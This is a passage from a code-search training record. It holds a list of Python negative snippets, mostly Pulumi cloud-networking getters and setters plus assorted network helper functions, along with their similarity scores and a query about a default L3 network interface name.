\"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel1_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_vgw_inside_address\", tunnel1_vgw_inside_address)\n if tunnel2_address is not None:\n pulumi.set(__self__, \"tunnel2_address\", tunnel2_address)\n if tunnel2_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel2_bgp_asn\", tunnel2_bgp_asn)\n if 
tunnel2_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel2_bgp_holdtime\", tunnel2_bgp_holdtime)\n if tunnel2_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_cgw_inside_address\", tunnel2_cgw_inside_address)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel2_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_vgw_inside_address\", tunnel2_vgw_inside_address)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if vgw_telemetries is not None:\n pulumi.set(__self__, \"vgw_telemetries\", vgw_telemetries)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def network(self):\n return self.__network",
"def __init__(__self__, *,\n extended_location: pulumi.Input['ExtendedLocationArgs'],\n l3_isolation_domain_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n vlan: pulumi.Input[float],\n hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,\n hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,\n interface_name: Optional[pulumi.Input[str]] = None,\n ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,\n ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,\n ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,\n l3_network_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"extended_location\", extended_location)\n pulumi.set(__self__, \"l3_isolation_domain_id\", l3_isolation_domain_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"vlan\", vlan)\n if hybrid_aks_ipam_enabled is None:\n hybrid_aks_ipam_enabled = 'True'\n if hybrid_aks_ipam_enabled is not None:\n pulumi.set(__self__, \"hybrid_aks_ipam_enabled\", hybrid_aks_ipam_enabled)\n if hybrid_aks_plugin_type is None:\n hybrid_aks_plugin_type = 'SRIOV'\n if hybrid_aks_plugin_type is not None:\n pulumi.set(__self__, \"hybrid_aks_plugin_type\", hybrid_aks_plugin_type)\n if interface_name is not None:\n pulumi.set(__self__, \"interface_name\", interface_name)\n if ip_allocation_type is None:\n ip_allocation_type = 'DualStack'\n if ip_allocation_type is not None:\n pulumi.set(__self__, \"ip_allocation_type\", ip_allocation_type)\n if ipv4_connected_prefix is not None:\n pulumi.set(__self__, \"ipv4_connected_prefix\", ipv4_connected_prefix)\n if ipv6_connected_prefix is not None:\n pulumi.set(__self__, \"ipv6_connected_prefix\", ipv6_connected_prefix)\n if l3_network_name is not None:\n pulumi.set(__self__, \"l3_network_name\", l3_network_name)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)",
"def ip_protocol(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def host_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"host_network\")",
"def host_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"host_network\")",
"def network_config(self) -> pulumi.Output['outputs.PrivateCloudNetworkConfig']:\n return pulumi.get(self, \"network_config\")",
"def __init__(__self__, *,\n endpoint_type: pulumi.Input[str],\n resource_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"endpoint_type\", 'HybridConnection')\n if resource_id is not None:\n pulumi.set(__self__, \"resource_id\", resource_id)",
"def _extend_network_dict_provider(self, context, network, bindings=None):\n if 'id' not in network:\n return\n if not bindings:\n bindings = nsx_db.get_network_bindings(context.session,\n network['id'])\n\n # With NSX plugin, \"normal\" overlay networks will have no binding\n if bindings:\n # Network came in through provider networks API\n network[pnet.NETWORK_TYPE] = bindings[0].binding_type\n network[pnet.PHYSICAL_NETWORK] = bindings[0].phy_uuid\n network[pnet.SEGMENTATION_ID] = bindings[0].vlan_id",
"def instance_charge_type(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def _get_network_type(self, host):\n network_type = host.get(\"network\")\n default_network = self.config.get(\"default_network\")\n if network_type is None:\n network_type = self._metadata.get(\"network\", default_network)\n if not network_type:\n raise ProvisioningConfigError(\n \"No network type specified and project doesn't have default \"\n \"network type (property 'default_network') specified in \"\n \"provisioning config.\"\n )\n return network_type",
"def get_network_protocols(self):\n return self.mycam.devicemgmt.GetNetworkProtocols()",
"def get_plugin_description(self):\n return (\"BGP dynamic routing service for announcement of next-hops \"\n \"for private networks and floating IP's host routes.\")",
"def ignore_missing_v_net_service_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_missing_v_net_service_endpoint\")",
"def get_plugin_description(self):\n return constants.L2_GATEWAY_SERVICE_PLUGIN",
"def update_network_plugin_settings(self, mc: ManagedCluster) -> ManagedCluster:\n self._ensure_mc(mc)\n\n network_plugin_mode = self.context.get_network_plugin_mode()\n if network_plugin_mode:\n mc.network_profile.network_plugin_mode = network_plugin_mode\n\n (\n pod_cidr,\n _,\n _,\n _,\n _\n ) = self.context.get_pod_cidr_and_service_cidr_and_dns_service_ip_and_docker_bridge_address_and_network_policy()\n\n network_dataplane = self.context.get_network_dataplane()\n if network_dataplane:\n mc.network_profile.network_dataplane = network_dataplane\n\n if pod_cidr:\n mc.network_profile.pod_cidr = pod_cidr\n return mc",
"def test_support_NETWORK(self):\n self.assertEqual(self._parseFeature(\"NETWORK\", \"IRCNet\"), \"IRCNet\")",
"def spec(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def server_type_name(self):\n ...",
"def _get_nets_other(self, *args, **kwargs):\n\n from warnings import warn\n warn('Whois._get_nets_other() has been deprecated and will be '\n 'removed. You should now use Whois.get_nets_other().')\n return self.get_nets_other(*args, **kwargs)",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def affectedNet(*args, name: Union[AnyStr, bool]=\"\", type: AnyStr=\"\", q=True, query=True,\n e=True, edit=True, **kwargs)->Union[None, Any]:\n pass",
"def _get_network_type(self):\n return collections.namedtuple('hyper_dqn_network',\n ['hyp_q_value', 'q_values'])",
"def get_ui_field_behaviour() -> Dict:\n return {\n \"hidden_fields\": ['schema', 'port', 'extra', 'host'],\n \"relabeling\": {\n 'login': 'Fivetran API Key',\n 'password': 'Fivetran API Secret',\n },\n \"placeholders\": {\n 'login': 'api key',\n 'password': 'api secret',\n },\n }",
"def backend_info(self):\n\t\treturn {'valid': False}",
"def no_device(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"no_device\")",
"def get_connection_form_widgets() -> dict:\n from wtforms import StringField\n from flask_appbuilder.fieldwidgets import BS3TextFieldWidget\n\n return {\n \"extra__ewah_metabase__http_string\": StringField(\n \"Use http instead of https?\",\n widget=BS3TextFieldWidget(),\n )\n }",
"def _get_nets_lacnic(self, *args, **kwargs):\n\n from warnings import warn\n warn('Whois._get_nets_lacnic() has been deprecated and will be '\n 'removed. You should now use Whois.get_nets_lacnic().')\n return self.get_nets_lacnic(*args, **kwargs)",
"def get_network_type(self):\n net_type = self._data['type']\n if net_type == 'Shared':\n return 'guest'\n elif net_type == 'Isolated':\n return 'isolated'",
"def networkInfo(self):\n assert False, \"Deriving class must implement\"",
"def network(self):\n return self._network",
"def network(self):\n return self._network"
] | [
"0.621237",
"0.5870624",
"0.56298715",
"0.5599445",
"0.54124904",
"0.5070947",
"0.5070947",
"0.4954396",
"0.4948518",
"0.4948518",
"0.49345273",
"0.48785043",
"0.48785043",
"0.4872126",
"0.48533687",
"0.48368704",
"0.4830044",
"0.48197207",
"0.47556755",
"0.47481972",
"0.47417736",
"0.47417736",
"0.47417736",
"0.47417736",
"0.47417736",
"0.47227025",
"0.47191507",
"0.47101194",
"0.4705164",
"0.4705164",
"0.4704899",
"0.470364",
"0.47021765",
"0.4682506",
"0.4679322",
"0.4679322",
"0.46670604",
"0.46411052",
"0.46404392",
"0.46390113",
"0.46348542",
"0.46274227",
"0.461952",
"0.46127126",
"0.4600558",
"0.45920202",
"0.45889044",
"0.45879993",
"0.45835537",
"0.45835537",
"0.45835537",
"0.45771432",
"0.45590955",
"0.45566478",
"0.4555754",
"0.45549297",
"0.45418888",
"0.45403346",
"0.45257464",
"0.45231602",
"0.4520921",
"0.45205656",
"0.45172474",
"0.45152175",
"0.4510261",
"0.4510261",
"0.4508536",
"0.45081025",
"0.45075846",
"0.45063978",
"0.45039824",
"0.45022908",
"0.45019796",
"0.44996828",
"0.44996828",
"0.4428486",
"0.4427678",
"0.44254985",
"0.44182143",
"0.44139463",
"0.44116622",
"0.4409479",
"0.44035876",
"0.4396699",
"0.4383272",
"0.43792602",
"0.43714467",
"0.43712446",
"0.43700236",
"0.43652645",
"0.4364992",
"0.43638447",
"0.43628988",
"0.43578696",
"0.43512228",
"0.434911",
"0.4344968",
"0.4344335",
"0.43391272",
"0.43386632",
"0.43386632"
] | 0.0 | -1 |
The default interface name for this L3 network in the virtual machine. This name can be overridden by the name supplied in the network attachment configuration of that virtual machine. | def interface_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "interface_name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def interface_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"interface_name\")",
"def l3_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"l3_network_name\")",
"def interface_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"interface_name\")",
"def network_interface_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_interface_id\")",
"def get_interface_name():\n interface_name = ''\n interfaces = psutil.net_if_addrs()\n for name, details in interfaces.items():\n for detail in details:\n if detail.family == socket.AF_INET:\n ip_address = ipaddress.ip_address(detail.address)\n if not (ip_address.is_link_local or ip_address.is_loopback):\n interface_name = name\n break\n return interface_name",
"def _get_interface_name(self):\n return self.__interface_name",
"def getDefaultLayerName(self):\n\t\treturn self._fileSystem.getDefaultLayerName()",
"def _get_ifname(self, intf_type, interface):\n if intf_type == 'port':\n ifname = 'Ethernet' + str(interface)\n elif intf_type == 'portchannel':\n ifname = 'po' + str(interface)\n else:\n raise Exception(\"Unknown interface type: \" + intf_type)\n\n return ifname",
"def get_logical_ifname(self, interface_name, proto='provision'): # pragma: no cover\n output = check_output(['uci', 'show', 'network'])\n network_list = output.strip().split('\\n')\n for config in network_list:\n cfg, option = config.split('=')\n net_prex = cfg.split(\".\")\n if net_prex[-1] == \"proto\" and str(option) != proto:\n ifname = '.'.join(net_prex[:-1]) + '.ifname'\n interface = check_output(['uci', 'get', ifname]).split('\\n')[0]\n if interface == interface_name:\n return net_prex[1]\n return ''",
"def get_default_config(self):\n if not self.iface_type:\n return None\n\n defaults = {}\n defaults['description'] = self.interface_name + ' Interface'\n defaults['admin'] = 'up'\n if self.is_ethernet:\n defaults['speed'] = 'auto'\n defaults['duplex'] = 'auto'\n defaults['type'] = 'bridged'\n elif self.iface_type == 'Bridge-Aggregation':\n defaults['type'] = 'bridged'\n else:\n defaults['type'] = 'routed'\n\n return defaults",
"def get_interface_name(self, network, port=None):\n if not port:\n device_id = self.get_device_id(network)\n port = self.plugin.get_dhcp_port(network.id, device_id)\n return self.driver.get_device_name(port)",
"def getDefaultName(self): # real signature unknown; restored from __doc__\n pass",
"def network_interface(self): \n return self._network_interface",
"def default_ip(ifname):\n ipr = IPRoute()\n index = ipr.link_lookup(ifname=ifname)[0]\n addr = ipr.get_addr(index=index)[0]\n interface = ipaddress.ip_interface('{}/{}'.format(addr.get_attr('IFA_ADDRESS'), addr['prefixlen']))\n addr = interface.ip + 1\n if addr in interface.network:\n return str(addr)\n raise TypeError(f'Unable to calculate default node ip in {ifname} ({interface})')",
"def moc_vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"moc_vnet_name\")",
"def managed_network_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"managed_network_name\")",
"def GetInterface(self):\n ifname = self.interface_watcher.get_last_ifname()\n if ifname is None:\n ifname = ''\n logger.debug('Replying \"' + ifname + '\" to D-Bus request GetInterface')\n return ifname",
"def get_default_ip():\r\n if CONFIG.BIND_INTERFACE is None:\r\n default_gw = netifaces.gateways()['default']\r\n if netifaces.AF_INET in default_gw:\r\n preferred_interface = default_gw[netifaces.AF_INET][1]\r\n else:\r\n interfaces = netifaces.interfaces()\r\n preferred_interface = next((i for i in interfaces if i != 'lo'), interfaces[0])\r\n else:\r\n preferred_interface = CONFIG.BIND_INTERFACE\r\n return netifaces.ifaddresses(preferred_interface)[netifaces.AF_INET][0]['addr']",
"def get_default_iface_name_linux():\n route = \"/proc/net/route\"\n with open(route) as f:\n for line in f.readlines():\n try:\n iface, dest, _, flags, _, _, _, _, _, _, _, = line.strip().split()\n if dest != '00000000' or not int(flags, 16) & 2:\n continue\n return iface\n except:\n continue",
"def cloud_services_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cloud_services_network_name\")",
"def get_network_name(self): # type: () -> str\n networks = self.get_network_names()\n\n if not networks:\n raise ApplicationError('No network found for Docker container: %s.' % self.id)\n\n if len(networks) > 1:\n raise ApplicationError('Found multiple networks for Docker container %s instead of only one: %s' % (self.id, ', '.join(networks)))\n\n return networks[0]",
"def default_name(self):\n return '[' + self.__class__.__name__ + ']'",
"def computer_network_name(self) -> str:\n return self._computer_network_name",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def interviewer_name_default(self, interviewer_name_default):\n\n self._interviewer_name_default = interviewer_name_default",
"def default_name(self):\n name = f\"Player {self.UID.split('-')[0]}\"\n return name",
"def vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"vnet_name\")",
"def get_network_default_gateway(self):\n return self.mycam.devicemgmt.GetNetworkDefaultGateway()",
"def get_name(self):\n \n return 'Socket/IP'",
"def network_watcher_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_watcher_name\")",
"def network_name(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"network_name\"), kwargs)",
"def get_interface(self, ifname):\n \n return self._ifname",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def get_default_ip_address():\r\n gws = netifaces.gateways() # get all gateways\r\n default = gws['default'] # get the default gw\r\n adapter = default[2][1] # get the adapter identifier\r\n realadapter = netifaces.ifaddresses(adapter) # get the adapter\r\n addr_dict = realadapter[2][0] # get the first ipv4 address tuple\r\n return addr_dict['addr']",
"def name(self) -> str:\n return self.config_name or self.host_name or self.dev_id or DEVICE_DEFAULT_NAME",
"def vnet_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"vnet_name\")",
"def get_network_name_on_vc(options):\n network = get_network_on_vc(options)\n if network:\n return network.name",
"def default_interface(dut,**kwargs):\n cli_type = st.get_ui_type(dut, **kwargs)\n\n if 'interface' not in kwargs:\n st.error(\"Mandatory arg interface is not present\")\n return False\n else:\n interface = kwargs['interface']\n\n skip_error = kwargs.pop('skip_error', False)\n command = ''\n\n if cli_type == 'klish':\n if 'range' in kwargs:\n command = command + \"\\n\" + \"default interface range {}\".format(interface)\n else:\n command = command + \"\\n\" + \"default interface {}\".format(interface)\n else:\n st.error(\"Invalid cli_type for this API - {}.\".format(cli_type))\n return False\n\n st.config(dut, command, type='klish',skip_error_check=skip_error)\n return True",
"def network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_id\")",
"def name(self):\n if self._name == '':\n return self.default_name\n else:\n return self._name",
"def name(self) -> str:\n return f\"{self._inst} NAT {self._data['name']}\"",
"def test_get_default_network(self):\n pass",
"def get_interface(\n network: Union[ipaddress.IPv6Interface, ipaddress.IPv4Interface, str], index: int\n) -> Union[ipaddress.IPv6Interface, ipaddress.IPv4Interface]:\n if isinstance(network, str):\n network = ipaddress.ip_network(network)\n\n host = network[index]\n return ipaddress.ip_interface(f\"{host}/{network.prefixlen}\")",
"def default_label(self) -> str:\n return self.settings[\"default_label\"]",
"def attached_network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"attached_network_id\")",
"def GetWirelessInterface(self):\n return str(self.wifi.wireless_interface)",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def get_interface_name(self, device, ipaddress, parser_obj=None):\n\n # Calling parser\n try:\n parsed_output = parser_obj.parse(ip=ipaddress)\n except SchemaEmptyParserError:\n # We are looping over all the ips provided in the testbed yaml file\n # Show command output will be empty in some cases.\n return None\n\n # Get the corresponding interface name\n for intf in parsed_output['interface'].keys():\n # Parser structure only has one interface\n interface_name = intf\n\n return interface_name",
"def set_interface(interface, name=''):\n if not interface:\n raise ValueError('interface is empty')\n\n global interfaces\n logger.debug('connection_name: \"{}\" -> {}.{}'.format(\n name,\n interface.__module__,\n interface.__class__.__name__\n ))\n interfaces[name] = interface",
"def get_default_vnchost_name(self):\n\t\treturn call_sdk_function('PrlDispCfg_GetDefaultVNCHostName', self.handle)",
"def network_fabric_controller_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_fabric_controller_name\")",
"def convert_interface_name(self, s):\n match = self.rx_interface_name.match(s)\n if not match:\n return s\n else:\n return \"DryContact %s\" % s",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def filename(self):\n return f'{self._peer.interface}.conf'",
"def name(self):\n # self._name = \"wyzeapi_\"+self._device_mac+\"_\"+ self._name\n return self._device.nickname",
"def nw_name(self):\n return self._nw_name",
"def _iface_type(self, if_name):\n\n if if_name.lower().startswith('gi'):\n if_type = 'GigabitEthernet'\n elif if_name.lower().startswith('ten'):\n if_type = 'Ten-GigabitEthernet'\n elif if_name.lower().startswith('fo'):\n if_type = 'FortyGigE'\n elif if_name.lower().startswith('vl'):\n if_type = 'Vlan-interface'\n elif if_name.lower().startswith('lo'):\n if_type = 'LoopBack'\n elif if_name.lower().startswith('br'):\n if_type = 'Bridge-Aggregation'\n elif if_name.lower().startswith('ro'):\n if_type = 'Route-Aggregation'\n elif if_name.lower().startswith('tu'):\n if_type = 'Tunnel'\n elif if_name.lower().startswith('tw'):\n if_type = 'TwentyGigE'\n elif if_name.lower().startswith('hu'):\n if_type = 'HundredGigE'\n else:\n if_type = None\n\n number_list = if_name.split(' ')\n if len(number_list) == 2:\n number = number_list[-1].strip()\n else:\n number = self._get_number(if_name)\n\n if if_type:\n proper_interface = if_type + number\n else:\n proper_interface = if_name\n\n return proper_interface, if_type",
"def renameIface(self, station, nextWlan, iface):\n iface = iface[:-1]\n station.cmd('ip link set dev %s name %s-wlan%s' % (iface, station, nextWlan))\n station.cmd('ifconfig %s-wlan%s up' % (station, nextWlan))",
"def Name(self, default=None):\n return self.data.get('name', default)",
"def default_namespace(self) -> Optional[str]:\n return self.schema.namespaces.get('')",
"def get_network_name(options):\n user = pwd.getpwuid(os.getuid())[0]\n return \"%s-%s\" %(user, options.name)",
"def default_docker_pull_conn_name(self) -> str:\n return self._default_docker_pull_conn_name",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def __str__(self):\n \n return self.net.ifconfig()",
"def interface(self):\n\n data = ['[Interface]']\n for item in INTERFACE_KEYS:\n value = getattr(self, item, None)\n if value:\n data.append(value)\n\n return '''\n'''.join(data)",
"def name(self):\n if self._name is None:\n return(self.default_name)\n else:\n return(self._name)",
"def name(self):\n if self.resource.is_client:\n return f\"{self.network.name} {self.resource.name_connection_type} {SWITCH_TYPES[self.variable][0]}\"\n elif self.resource.is_eero or self.resource.is_profile:\n return f\"{self.network.name} {self.resource.name} {SWITCH_TYPES[self.variable][0]}\"\n return f\"{self.resource.name} {SWITCH_TYPES[self.variable][0]}\"",
"def _set_interface_name(self, v, load=False):\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1][0-6]))/([1-9]|[1-9][0-9]|[1-9][0-9][0-9])(:[1-4])?)', 'length': [u'3..16']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..512']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4090']}),], is_leaf=True, yang_name=\"interface-name\", rest_name=\"interface-name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'info': u'The Interface value.'}}, namespace='urn:brocade.com:mgmt:brocade-fcoe-ext', defining_module='brocade-fcoe-ext', yang_type='union', is_config=True)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"interface_name must be of a type compatible with union\"\"\",\n 'defined-type': \"brocade-fcoe-ext:union\",\n 'generated-type': \"\"\"YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1][0-6]))/([1-9]|[1-9][0-9]|[1-9][0-9][0-9])(:[1-4])?)', 'length': [u'3..16']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..512']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4090']}),], is_leaf=True, yang_name=\"interface-name\", rest_name=\"interface-name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'info': u'The Interface value.'}}, namespace='urn:brocade.com:mgmt:brocade-fcoe-ext', defining_module='brocade-fcoe-ext', yang_type='union', is_config=True)\"\"\",\n })\n\n self.__interface_name = t\n if hasattr(self, '_set'):\n self._set()",
"def network(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"network\")",
"def name(self):\n return self._imu.IMUName()",
"def setDefaultNS(self, ns):\n self.default_ns = ns",
"def _get_ifname(self):\n return self.__ifname",
"def GetDefaultWiredNetwork(self):\n config = ConfigParser.ConfigParser()\n config.read(self.wired_conf)\n profileList = config.sections()\n for profile in profileList:\n if config.has_option(profile, \"default\"):\n if misc.to_bool(config.get(profile, \"default\")):\n return profile\n return None",
"def get_name():\n\n return 'nettools'",
"def get_default_namespace(self):\n return None",
"def name(self) -> str:\n return self._alias or f\"Nut-{self._host}\"",
"def get_ipv4_defaultgw(self):\n \n ipv4_defaultgw = self._dhcp_client_ctrl.getIpv4DefaultGateway()\n if ipv4_defaultgw is None:\n return None\n else:\n return unicode(ipv4_defaultgw)",
"def layer_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"layer_name\")",
"def create_default_network(context):\n return [{\n 'type': 'templates/network.py',\n 'name': 'fc-network',\n 'properties': {\n 'resourceName': 'network',\n 'name': 'network',\n 'projectId': '$(ref.fc-project.projectId)',\n 'autoCreateSubnetworks': True,\n # We pass the dependsOn list into the network template as a\n # parameter. Deployment Manager doesn't support dependsOn for\n # template-call nodes, so we can't have this resource itself depend on\n # the project-wide resources.\n 'dependsOn': '$(ref.fc-project.resourceNames)',\n },\n }]",
"def default_docker_pull_conn_name(self, default_docker_pull_conn_name: str):\n\n self._default_docker_pull_conn_name = default_docker_pull_conn_name",
"def LegacyName(self, default=None):\n return self.data.get('legacy_name', default)",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def default_prefix(self) -> str:\n return \"\"",
"def default_prefix(self) -> str:\n return \"\"",
"def DetectWirelessInterface(self):\n iface = self.wifi.DetectWirelessInterface()\n if iface:\n print 'Automatically detected wireless interface ' + iface\n else:\n print \"Couldn't detect a wireless interface.\"\n return str(iface)",
"def iface_config(self, iface, *args, **kwargs):\n if not set(kwargs).issubset({'intf_ip_addr', 'netns', 'adminMode'}):\n raise NotImplementedError(\"Method is not implemented for current kwargs.\")\n if kwargs.get('netns', False):\n # Create network namespaces for current iface\n self.create_namespaces(iface)\n del kwargs['netns']\n if 'intf_ip_addr' in kwargs:\n kwargs['ipAddr'] = \"{}/24\".format(kwargs['intf_ip_addr'])\n if iface in self.namespaces:\n self._lhost.ui.enter_namespace(self.namespaces[iface])\n self._lhost.ui.modify_ports([iface], **kwargs)\n if iface in self.namespaces:\n self._lhost.ui.exit_namespace()",
"def guess_nic_name(self, nic_number):\n if nic_number == 1:\n return \"mgmt0\"\n else:\n return (\"Ethernet{0}/{1}\".format((nic_number - 2) // 48 + 2,\n (nic_number - 2) % 48 + 1))",
"def identity(self, default=\"\"):\n for prop in (\"standard_name\", \"grid_mapping_name\"):\n n = self.coordinate_conversion.get_parameter(prop, None)\n if n is not None:\n return f\"{prop}:{n}\"\n\n n = self.nc_get_variable(None)\n if n is not None:\n return f\"ncvar%{n}\"\n\n return default",
"def fortran_interface(self) -> str:\n return ''",
"def get_default(self, create=True):\n if self._default_network is None and create:\n log.debug(\"Creating default network...\")\n self._default_network = self.create('default', driver='bridge')\n\n return self._default_network",
"def interface(self):\n if self._interface is None:\n expression = expressions.WPA_INTERFACE\n name = expressions.INTERFACE_NAME\n command = self.interface_list_command\n self._interface = self._match(expression,\n name,\n command)\n return self._interface",
"def GetCurrentNetwork(self, iwconfig=None):\n current_network = str(self.wifi.GetCurrentNetwork(iwconfig))\n return current_network",
"def default_endpoint(self) -> str:\n return self.settings[\"default_endpoint\"]",
